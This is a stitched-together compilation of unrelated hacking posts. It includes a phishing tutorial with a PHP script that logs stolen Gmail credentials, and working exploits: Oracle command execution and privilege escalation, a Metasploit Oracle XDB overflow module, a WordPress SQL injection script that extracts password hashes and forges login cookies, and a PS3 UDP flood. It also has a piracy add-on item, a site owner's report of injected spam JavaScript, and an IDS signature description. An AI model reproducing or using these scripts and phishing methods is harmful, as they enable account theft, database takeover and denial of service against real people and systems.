Firefox addon makes pirating music easier

The Amazon MP3 Store may have the lowest prices on DRM free music, but for some people 79 cents for a song is just too much, especially when [john] and the folks at pirates-of-the-amazon.com can help you get that song for free. Pirates of the Amazon is a slick Firefox addon that inserts a “download 4 free” button next to the “add to cart” button in the Amazon MP3 Store. After clicking on the button, the addon refers users to a thepiratebay.org search page with bittorrent download links for the song or album. While there is no question that this makes getting your music easier, by using this addon you do run the risk of violating copyright laws, depending on which country you live in.
There isn’t much here that hasn’t been thrown into Greasemonkey scripts in the past and we wonder if they’re marketing this to anyone at all. People who absolutely love using Amazon but hate buying stuff perhaps? They cite a couple interesting projects in their about section: Amazon Noir robotically abused the “Search Inside” feature to reconstruct entire books. OU Library searches your local library to see if it has the Amazon book you’re looking for.

How to send phishing page to victim

Phishing is the most used trick for email account hacking but most of the people think this trick as not working. But in My opinion, this is the best and most successful trick for hacking. Trojans and keyloggers are detected by Antivirus programs but this one is not. The only thing about the phishing is how ou are creating the phishing page and sending it to the victim.
THe success of phishing depends on you. If you just save the login page ans host on a freehost. Do you think the interent user is so dumb to login via you url. Why they will use your page if they can type facebook.com on URL bar. 60% so called hackers just do this and think they are phishers and suggest people not to use phishing as being hacker. what the shit.
DO you really know Phishing has 70% share in big cyber crimes. Then how can it be waste. Today i am going to write few tips which can be helpful to use phishing as a hacking method.


1. Use of fake login form just like original one is the simplest way but have 10% success rate. So Never use this. Try to think somethink innovative and create some offer page related to the account you want to hack and then try to get attention of users towards your offer. Now what should be the offer. Here comes social engineering. Try to know about the victim more and then think what he likes more and want to get. then try to relate that with your offer and then create the page. EX: a year back in orkut, most of the persons wanted to know who is invisible on chat. There are many tricks. At that time i use a invisible person finder offer as a phishing.


2. Keep your page as real as you can. So you need to know better understandings of website design. Better website design looks better and real. You have to work hard on that. 


3. Always send a long URL to victim ex: www.yourdomain.host.com?url=www.google.com/asdf/login/offer/winprizes&method=login
Here URL is only www.yourdomain.host.com rest query strings are to confuse the victim in url.


4. Always create a better html email which attracts the victim and looks some professional. A simple plain mail doesn't have good impact.


5. you can use dns cache poisoning to poison victim system's cache to redirect his browser to your phishing page automatically when he try to connet original website. In this way simple login form will also work. But you will have to manage DNS poison.


6. You can also use tab napping to send phishing page.

How to create gmail phishing page

Phishing is one of the best way to hack gmail account. I had already posted some articles on phishing but few of those are not available due to post loss in website transfer. So i am writing an article again.


Download the phishing page from HERE


To create phishing page of gmail, first of all open gmail in your browser. Then click on file and then save as.





Now you have saved gmail login page to your system.


Now open the saved page in notepad or or any other html editor tool. Now search for form tag <form


You will see some thing like this <form id="gaia_loginform" action="https://accounts.google.com/ServiceLoginAuth" method="post"> The form is set to send the data to url given in action attribute.


Change action attribute to write.php


<form id="gaia_loginform" action="write.php" method="post"> Now form will send data to your write.php


Now create a file write.php in the same directory and write

<?php
header("Location: http://www.gmail.com/");
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Now create an account in a free hosting that support php and upload all the files to the server.

Oracle (extproc)Local/Remote Command Execution Exploit

Exploit:
--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi (raptor@0xdeadbeef.info)
--
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g
-- allows remote attackers to access arbitrary libraries outside of the
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
--
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
-- to remotely execute arbitrary OS commands with the privileges of the DBMS
-- user (the CREATE [ANY] LIBRARY privilege is needed).
--
-- See also:
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
--
-- Vulnerable platforms:
-- Oracle 9i (all versions?)
-- Oracle 10g versions prior to 10.1.0.3
--
-- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production,
-- running on both Solaris 9 and 10 systems. It will need some tweakings to
-- properly work on other platforms.
--
-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r-- 1 oracle orainst 0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_shell32
language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_shell64
language c;
end oracmd64;
/

Multiple Oracle Application Server Vulnerabilities

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
-----------------------------------------------------------
-----------------------------------------------------------

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::oracle9i_xdb_http;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{

'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 8080],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Blackhat conference.
}),

'Refs' => [
['BID', '8375'],
['CVE', '2003-0727'],
['URL',
'http://www.blackhat.com/presentations/bh-usa-03/
bh-us-03-litchfield-paper.pdf']
],

'DefaultTarget' => 0,
'Targets' => [

['Oracle 9.2.0.1 Universal', 0x60616d46],

],

'Keys' => ['oracle'],

'DisclosureDate' => 'Aug 18 2003',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},
@_);
return($self);
}

sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}

$s->Send("GET / HTTP/1.0\r\n\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();

if ($res !~ /9\.2\.0\.1\.0/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}

$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}

sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $offset = $self->GetVar('OFFSET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}

my $splat =
"meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42".
pack('V', $target->[1]). "wwwwoooottttsssshhhhllll".
$self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode;

my $sploit =
"GET / HTTP/1.1". "\r\n".
"Host: $target_host:$target_port". "\r\n".
"User-Agent: Mozilla/5.0 (X11; U; Linux i686;".
"en-US; rv:1.7.12) Gecko/20050923". "\r\n".
"Accept: text/xml,application/xml,application".
"/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,".
"image/png,*/*;q=0.5". "\r\n".
"Accept-Language: en-us,en;q=0.5". "\r\n".
"Accept-Encoding: gzip,deflate". "\r\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n".
"Keep-Alive: 300". "\r\n".
"Connection: keep-alive". "\r\n".
"Authorization: Basic ". Pex::Text::Base64Encode($splat, '').
"\r\n\r\n";

$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x",
$target->[0], $target->[1]));

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}

1;

Wordpress 2.0.5 Trackback UTF-7 SQL Injection Exploit

Vulnerable Systems:
* WordPress version 2.0.5 and prior
Immune Systems:
* WordPress version 2.0.6

Exploit:
#!/usr/bin/python
###########################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || ||
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| _
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_
#
###########################################################
# Proof of concept code from the Hardened-PHP Project
#
# NOT FOR DISTRIBUTION
# PLEASE DO NOT SPREAD THIS CODE
#
###########################################################
#
# -= Wordpress 2.0.5 =-
# Trackback UTF-7 SQL injection exploit
#
# beware of encoded single-quotes
#
###########################################################

import urllib
import getopt
import sys
import string
import re
import time
import datetime
import md5

__argv__ = sys.argv

def banner():
print "Wordpress 2.0.5 - Trackback UTF-7 SQL injection exploit"
print "Copyright (C) 2006 Stefan Esser/Hardened-PHP Project"
print " *** DO NOT DISTRIBUTE ***\n"

def usage():
banner()
print "Usage:\n"
print " $ ./wordpressx.py [options]\n"
print " -h http_url url of the Wordpress blog"
print " f.e. http://www.wordpress.org/development/"
print " -p id id of posting to exploit trackback (default: 1)"
print " -i id User id to steal password hash for(default: -1)"
print " -u username username to steal password hash for (default: ...)"
print ""
sys.exit(-1)

def determineCookieHash(host):

wclient = urllib.URLopener()

print "[+] Connecting to retrieve cookie hash"

try:
req = wclient.open(host + "/wp-login.php?action=logout")
except IOError, e:
if e[1] == 302:
# Got a 302 redirect, but check for cookies before redirecting.
# e[3] is a httplib.HTTPMessage instance.
if e[3].dict.has_key('set-cookie'):
cookie = e[3].dict['set-cookie'];
chash = cookie[string.find(cookie, "user_")+5:]
chash = chash[:string.find(chash, "=")]
print "[+] Cookie hash found: %s" % chash
return chash


print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
return ""

def determineIsMbstringInstalled(host, pid):

wclient = urllib.URLopener()

print "[+] Connecting to check if mbstring is installed"

params = {
'charset' : 'UTF-7',
'title' : '+ADA-'
}

try:
req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
except IOError, e:
if e[1] == 302:
print "[+] ext/mbstring is installed. continue with exploit"
return 1

content = req.read()

if string.find(content, 'error>1') != -1:
print "[-] Illegal posting id choosen, test impossible"
sys.exit(-2)

print "[-] ext/mbstring not installed... exploit not possible"
sys.exit(-2)
return 0

def determineTablePrefix(host, pid):

wclient = urllib.URLopener()

print "[+] Connecting to determine mysql table prefix"

params = {
'charset' : 'UTF-7',
'title' : 'None',
'url' : 'None',
'excerpt' : 'None',
'blog_name' : '+ACc-ILLEGAL'
}

try:
req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
except IOError, e:
if e[1] == 302:
print "[-] Table prefix cannot be determined... exploit not possible"
sys.exit(-2)
return ""

content = req.read()

f = re.search('FROM (.*)comments WHERE', content)
if f != None:
prefix = f.group(1)
print "[+] Table prefix is: %s" % prefix
return prefix

print "[-] Table prefix cannot be determined... exploit not possible"
sys.exit(-2)
return ""

def lockTrackbacks(host, pid):

now = datetime.datetime.utcnow()
now = now.replace(microsecond = 0)

future = now + datetime.timedelta(days=1)
future = future.replace(microsecond = 0)

wclient = urllib.URLopener()

print "[+] Connecting to lock trackbacks"

author = "Mark Mouse"
author_email = "mark@incidents.org"
author_url = ""
author_ip = "210.35.2.3"
agent = "Internet Explorer"
futuredate = future.isoformat(' ')
futuredate_gmt = future.isoformat(' ')
date = now.isoformat(' ')
date_gmt = now.isoformat(' ')

sql = "%s','%s','%s','%s','%s','%s','','0','%s',
'comment','0','0'),('0', '', '', '', '', '%s', '%s',
'', 'spam', '', 'comment', '0','0' ) /*" % \ ( author , author_email , author_url , author_ip , date , date_gmt , agent, futuredate, futuredate_gmt )

sql = string.replace(sql, "'", "+ACc-")

params = {
'charset' : 'UTF-7',
'title' : 'None',
'url' : 'None',
'excerpt' : 'None',
'blog_name' : sql
}

try:
req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
except IOError, e:
if e[1] == 302:
print "[-] Table prefix cannot be determined... exploit not possible"
sys.exit(-2)
return ""

content = req.read()

return ""

def checkUsername(host, pid, prefix, name, uid):

wclient = urllib.URLopener()

print "[+] Connecting to check if user %s is present" % name

if uid != -1:
sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE ID='%s' /*" % (prefix, uid)
else:
sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE user_login='%s' /*" % (prefix, name)

sql = string.replace(sql, "'", "+ACc-")

params = {
'charset' : 'UTF-7',
'title' : 'None',
'url' : 'None',
'excerpt' : 'None',
'blog_name' : sql
}

req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))

content = req.read()


if string.find(content, 'Duplicate') != -1:
return 1
if string.find(content, 'Doppelter') != -1:
return 1

if uid != -1:
print "[-] Error user_id invalid"
else:
print "[-] Error username invalid"
sys.exit(-2)
return 0


def bruteforceBit(host, pid, prefix, name, uid, bit):

wclient = urllib.URLopener()

nibble = (bit / 4) + 1
bit = (bit % 4) + 1
sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE " % prefix

if uid != -1:
sql = sql + "ID='%s'" % uid
else:
sql = sql + "user_login='%s'" % name
sql = sql + " and substring(reverse(lpad(conv(substring(user_pass, %d,1), 16, 2),4,'0')),%d,1)='1' /*" % (nibble, bit)

sql = string.replace(sql, "'", "+ACc-")

params = {
'charset' : 'UTF-7',
'title' : 'None',
'url' : 'None',
'excerpt' : 'None',
'blog_name' : sql
}

req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))

content = req.read()

if string.find(content, '15 seconds') != -1:
return 0
if string.find(content, '15 Sekunden') != -1:
return 0
if string.find(content, 'Duplicate') != -1:
return 1
if string.find(content, 'Doppelter') != -1:
return 1

print "[-] Error retrieving password hash: unexpected reply at bit %d" % bit
sys.exit(-2)
return ""

def bruteforce(host, pid, prefix, name, uid):

phash = ""

print "[+] Retrieving the password hash bit by bit"

for i in range(32):
nibble = 0
for j in range(4):
nibble = nibble | (bruteforceBit(host, pid, prefix, name, uid, i*4+j) << j)
phash = phash + "%x" % nibble

return phash


def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:i:u:p:e:d:")
except getopt.GetoptError:
usage()

if len(__argv__) < 2:
usage()

username = 'admin'
password = None
email = None
domain = None
host = None
pid = 1
uid = -1
for o, arg in opts:
if o == "-h":
host = arg
if o == "-p":
pid = arg
if o == "-i":
uid = arg
if o == "-u":
username = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg

# Printout banner
banner()

# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)

# if username == None:
# print "[-] username needed to continue"
# sys.exit(-1)
# if password == None:
# print "[-] password needed to continue"
# sys.exit(-1)
# if email == None:
# print "[-] email address needed to continue"
# sys.exit(-1)
# if domain == None:
# print "[-] catch all domain needed to continue"
# sys.exit(-1)

determineIsMbstringInstalled(host, pid)
chash = determineCookieHash(host)
lockTrackbacks(host, pid)

prefix = determineTablePrefix(host, pid)
checkUsername(host, pid, prefix, username, uid)

phash = bruteforce(host, pid, prefix, username, uid)

print "[+] Done..."
print " The password hash is %s" % phash

m = md5.new()
m.update(phash)
cphash = m.hexdigest()

print " The logincookies are:"
print " wordpressuser_%s=%s" % (chash, username)
print " wordpresspass_%s=%s" % (chash, cphash)

if __name__ == "__main__":
main()

# milw0rm.com [2007-01-07]

Wordpress 2.3.3 Exploit/Vulnerability - Adds Spam Directory

Tonight, while checking my site backup's sync log, I noticed a folder named "1" in the output, residing at the top level of the wp-content folder. Within the "1" folder, there are 71 separate files -- 70 poker-site-spammy HTML pages, each in Italian, and one g.js file. There was also a folder named backup-6bb0d, which contained a zero-byte index.php, at the top level of the wp-content folder. The wp-content's index.php file (which just says 'silence is golden') had also been edited or replaced -- but the only change is a blank line on row one. My site itself wasn't hacked -- all files and folders are just fine. No new stories or comments or users were created, etc. It seems the extent of the hack was creating the "1" folder.

I checked my sftp, ftp, and access logs, and there's nothing suspicious there at all -- which makes me suspect this is some sort of injection attack. I searched the logs around the time the files were created, but with my limited technical skills, noting seemed out of whack (there are no references to "poker.html" in any of the log files, for instance). The g.js file contains one "var str" definition that's ASCII encoded; I decoded it and got this output (line breaks added for readability):

var referer = escape(document.referrer);"
"var fromd = escape(document.location);"
"document.write("<fram"+"eset frame"+"border=0
frames"+"pacing=0 border=0 rows=\"1"+"00%, *
\"noresize><fr"+"ame name=\"online\" src=\""+
fid+"&q="+q1+"&referer="+referer+"&l="+lang+"
&c="+subacc+"&from="+fromd+"\" noresize></fra"+"meset>");

That means nothing at all to me. Here's the full .js file, with the "var str" bit removed, given it's shown above:

function Decode()
{
var temp="",i,c=0,out="";
var str="118#97#114#32#etc as decoded above...;
l=str.length;
while(c<=str.length-1)
{
while(str.charAt(c)!='#')
temp=temp+str.charAt(c++);
c++;
out=out+String.fromCharCode(temp);
temp="";
}
document.write(out);
}
function r(keyw, cat, lang)
{
document.write("<script language='javascript'>");
document.write("var fid='http://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"';
var lang='"+lang+"'; var subacc='"+cat+"';");
Decode();
document.write("<\/script>");
}

In the HTML files themselves, there are only four links. The first three are external links, but they simply go to the Italian versions of Google, MSN, and Yahoo (nothing passed with the URLs at all, just the root). The fourth is an href link back to the document itself, like this:

<a href="giochi-poker-gratis-da-scaricare.html">giochi poker gratis da scaricare</a>

I'm not sure if the Javascript works (somehow?) with that last URL, but that's all that's in each file (I'll gladly send anyone the folder if you want to take a look at the whole thing). I also Googled on one of the less-commonly-named files, and found that my site is not alone. As you can see there, a number of WordPress sites contain the "1" folder and associated HTML files.

My site runs WordPress 2.3.3, but I do use a number of third-party plug-ins -- and that's where my suspicions lie for the most likely culprit. However, I don't have any idea how to go about figuring out how someone got in ... nor if there are better places than this to report an apparent security issue. So if anyone can offer any advice, I'd welcome it!

HTTP Adobe SWF Remote Code Execution

Severity: High
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description:
This signature detects an attempt to exploit a vulnerability in Adobe Flash Player which may result in remote code execution.

Additional Information:
Adobe Flash Player is an application for playing Flash media files.

Flash Player is prone to a remote buffer-overflow vulnerability when processing SWF files with the 'DefineSceneAndFrameLabelData' tag (tag ID 0x56). The issue stems from an integer overflow when calculating pointers. Attackers can use this issue to write to arbitrary memory locations.

An attacker can exploit the issue by enticing an unsuspecting victim to open a specially crafted multimedia file with the vulnerable application.

Successful exploits will allow the attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

Adobe Flash Player 9.0.115.0 and earlier versions are affected.

NOTE: This issue has been fixed in all versions of Adobe Flash Player 9.0.124.0.

Initial investigations suggested that the vulnerability had not been patched in the standalone Adobe Flash Player version 9.0.124.0 for Linux and the standalone Adobe Flash Player version 9.0.124.0 with debug capabilities for Microsoft Windows. The observed behavior that led to this initial conclusion has since been confirmed by Adobe as intended by design.

Affected:
Turbolinux wizpy
Turbolinux FUJI
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP1
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
S.u.S.E. Novell Linux Desktop 9
S.u.S.E. Linux 10.1 x86-64
S.u.S.E. Linux 10.1 x86
S.u.S.E. Linux 10.1 ppc
RedHat Enterprise Linux Supplementary 5 server
RedHat Enterprise Linux Extras 4
RedHat Enterprise Linux Extras 3
RedHat Enterprise Linux Desktop Supplementary 5 client
Gentoo Linux
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.5
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.4.11
Apple Mac OS X 10.5
Adobe Flex 3.0
Adobe Flash Professional 8
Adobe Flash Player Plugin 9.0.31 .0
Adobe Flash Player Plugin 9.0.28 .0
Adobe Flash Player Plugin 9.0.20 .0
Adobe Flash Player Plugin 9.0.16
Adobe Flash Player Plugin 8.0
Adobe Flash Player Plugin 9.0.18d60
Adobe Flash Player 9.0.48.0
Adobe Flash Player 9.0.47.0
Adobe Flash Player 9.0.45.0
Adobe Flash Player 9.0.31.0
Adobe Flash Player 9.0.28.0
Adobe Flash Player 9.0.115.0
Adobe Flash Player 9
Adobe Flash Player 8.0.35.0
Adobe Flash Player 8.0.34.0
Adobe Flash CS3 Professional 0
Adobe Flash Basic 8
Adobe AIR 1.0

Response:
The vendor released Flash Player 9.0.124.0 to address this issue. Please see the references for more information.

Possible False Positives:
There are no known false positives associated with this signature.

Additional References:
CVE-2007-0071
SecurityFocus BID: 28695

Playstation 3 "Remote Play" Remote DoS Exploit

Mar 26 2007 05:24AM
mak0b inbox com

#!/usr/bin/perl
####.:Playstation 3 "Remote Play" Remote DoS Exploit:.###
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K (mak0b[AT]inbox.com)
#
# POC code is based on odix's perl udp flooder
#########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=1) {
printf "usage: ./ps3rpdos.pl \n";
exit(1);
}

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}